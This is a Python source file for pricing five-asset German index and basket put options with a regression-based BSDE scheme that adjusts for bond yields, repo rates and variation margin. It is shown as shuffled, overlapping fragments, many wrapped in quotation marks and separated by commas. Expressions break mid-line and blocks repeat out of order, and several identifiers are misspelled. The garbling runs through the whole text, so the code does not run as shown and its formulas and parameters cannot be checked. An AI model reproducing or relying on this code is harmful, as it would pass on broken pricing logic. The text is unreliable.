self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij->", "index model\" dimension = 5 # Stock parameters stock_model = \"BS\" initial_value =", "(1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j,", "model\" dimension = 5 # Stock parameters stock_model = \"BS\" initial_value = np.array([0.01,", "import numpy as np class GermenIndexPut(): # Example Information name = \"Put option", "0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate,", "return rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust =", "- self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate * delta_t", "self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0,", "basis_order = 2 no_of_regression = 1 + 5 + 1 + 5 def", "dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield", "1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike", "regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar,", "1. self.buy_sell = 1. self.put_call = \"Put\" # Regression functions and parameters self.sorting_method", "Mon May 14 17:21:26 2018 @author: <NAME> This file holds the parameters for", "np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar =", "riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price =", "-1. put_call = \"Put\" # Regression functions and parameters sorting_method = \"Intrinsic Value\"", "parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression", "i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution", "option for a 5 stocks German index model\" dimension = 5 # Stock", "self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) #", "dtype=np.double) strike = 1. terminal_time = 1. buy_sell = -1. put_call = \"Put\"", "# Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike =", "= 1. terminal_time = 1. buy_sell = -1. put_call = \"Put\" # Regression", "= self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 *", "= 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar =", "+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient,", "self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" def", "return temp / (1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta,", "14 17:21:26 2018 @author: <NAME> This file holds the parameters for all specific", "+ self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t", "reference_riskfree = False refererce_adjust = False # Under development class GeometicBasketPut(): def __init__(self,", "scheme to the function file \"\"\" import numpy as np class GermenIndexPut(): #", "bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate", "- self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] *", "numerical scheme to the function file \"\"\" import numpy as np class GermenIndexPut():", "= np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike =", "parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets =", "* theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar,", "- self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis,", "Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion", "<gh_stars>1-10 \"\"\" Created on Mon May 14 17:21:26 2018 @author: <NAME> This file", "= 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model =", "GermenIndexPut(): # Example Information name = \"Put option for a 5 stocks German", "Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression = 1 +", "expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm ->", "return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method", "np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0.,", "delta_process): temp = \\ (1 - (1-theta[0]) * rate * delta_t) * np.einsum('j,", ":], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate +", "= 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse", "Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1.", "Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression = 1 + 5", "Value\" basis_order = 3 no_of_regression = 1 + 5 + 1 + 5", "= 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension,", "= 2 no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self,", "stocks German index model\" dimension = 5 # Stock parameters stock_model = \"BS\"", "self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar", "= 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension,", "self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 *", "self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t", "\"Intrinsic Value\" basis_order = 3 no_of_regression = 1 + 5 + 1 +", "self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 *", "= self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta,", "np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t)", "0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07", "ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk,", "expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) *", "dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension", "self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell", "0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91,", "* np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition", "expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2*", "(self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :],", "rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion):", ":], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield -", "i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust", "rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient,", "i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price", "adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression))", "Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut():", "Intrinsic Value\" basis_order = 2 no_of_regression = 1 + 5 + 1 +", "(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0])", "adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6):", "(1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t", "= \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression", "= 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension,", "delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1])", "- self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))", "\"Geometric Intrinsic Value\" basis_order = 2 no_of_regression = 1 + 5 + 1", "Created on Mon May 14 17:21:26 2018 @author: <NAME> This file holds the", "self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t", "buy_sell = -1. put_call = \"Put\" # Regression functions and parameters sorting_method =", "self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis,", "self.name = \"Arithmetic basket put option for BS model\" self.dimension = dimension #", "basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression = 1 + 5", "return rec # Reference Solution reference_riskfree = False refererce_adjust = False Example =", "(1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t *", "0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market", "(1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate", "= 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell =", "0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate =", "* delta_t * theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield +", "@author: <NAME> This file holds the parameters for all specific example and the", "rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1])", "* (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar", "delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t * (1 -", "regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield", "delta_coefficient, expect_basis) return temp / (1 + rate * delta_t * theta[0]) def", "regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6,", "theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters", "delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) *", "ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj -> k',", "self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" # Regression functions and", "+ 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression))", "0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05", "* (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\", ":], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion,", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield -", "put_call = \"Put\" # Regression functions and parameters sorting_method = \"Intrinsic Value\" basis", "# Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\"", "# Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False class", "in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i", "np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient,", "= 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition", "adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate ,", "(self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik',", "- self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate)", "weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time =", "self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate * delta_t * theta[0])", "5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570,", "regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield", "* np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield", "Example Information self.name = \"Arithmetic basket put option for BS model\" self.dimension =", "- self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i, ji,", "= \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6,", "regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield", "class GermenIndexPut(): # Example Information name = \"Put option for a 5 stocks", "np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single)", "def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket put option for", "# Example Information self.name = \"Arithmetic basket put option for BS model\" self.dimension", "0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0.,", "* delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self,", "self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model", "* (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield", "1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate,", "expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar +", "5 stocks German index model\" dimension = 5 # Stock parameters stock_model =", "(1 - theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield", "delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1])", "in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i", "40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float)", "the numerical scheme for the BSDE. .. todo:: Moving the numerical scheme to", "= 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets,", "# Regression functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\"", "file \"\"\" import numpy as np class GermenIndexPut(): # Example Information name =", "delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji,", "0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1", "delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield -", "def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis,", "* theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and", "(1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t", "delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\", "regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate +", "delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters", "= \"Put\" # Regression functions and parameters sorting_method = \"Intrinsic Value\" basis =", ":], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6,", "= self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12,", "theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\", "= delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i", "adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method = \"Geometric Intrinsic Value\"", "= dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar =", "l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1", "= \\ (1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient,", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis)", "self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) /", "Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time =", "(1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1])", "ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji,", "sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression =", "+ 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product", "* rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t *", "expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :])", "parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1.", "* np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition)", "theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta,", "riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):", "self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i]", "parameters self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion", "sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0.,", "for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return", "expect_basis) return temp / (1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self,", "cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82,", "\"\"\" import numpy as np class GermenIndexPut(): # Example Information name = \"Put", "= \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion", "self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield", "= self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta =", ", regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield", "* (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t *", "adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec #", "(self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)),", "* (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ -", "(self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t * (1", "stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5", "= 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient,", "lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp", ":])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate)", "0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension))", "riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method =", "dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2", "price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate * delta_t)", "adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate)", "expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ +", "# Regression functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric", "np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:,", "and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3", "self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension *", "return rec # Reference Solution reference_riskfree = False refererce_adjust = False # Under", "= \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension", "self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\", "self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield", "theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0,", "np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell", "i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:,", "1. terminal_time = 1. buy_sell = -1. put_call = \"Put\" # Regression functions", "+ 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree =", "holds the parameters for all specific example and the numerical scheme for the", "[0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005,", "= self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta =", "jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return", "theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight =", "delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis,", "Stock parameters self.stock_model = \"BS\" 